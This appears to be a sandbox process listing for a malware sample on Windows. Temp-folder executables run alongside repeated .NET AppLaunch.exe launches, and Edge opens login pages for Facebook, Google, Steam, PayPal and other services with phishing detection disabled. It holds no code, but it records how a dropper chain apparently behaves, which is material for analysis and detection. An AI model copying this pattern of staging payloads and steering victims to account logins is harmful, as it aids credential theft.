C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,12606583097263019879,1421670158080145345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,6079581193036763766,16443627442431298099,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,6079581193036763766,16443627442431298099,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,15089947759427634908,4103637545934056150,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,5817130129062532480,10404778281756071391,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,15089947759427634908,4103637545934056150,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,5817130129062532480,10404778281756071391,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,12606583097263019879,1421670158080145345,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,16549258004922670089,10666659881124637519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,15271627626200575277,1304981048308037574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,15271627626200575277,1304981048308037574,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,16549258004922670089,10666659881124637519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5604 -ip 5604

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,9806041418775443204,12770503335048984515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,3311121091309154568,2000033028958502028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,3311121091309154568,2000033028958502028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,9980085495514694839,17560075144587770154,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8mi302yt.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8mi302yt.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9YQ3ly1.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9YQ3ly1.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7924 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7924 /prefetch:8

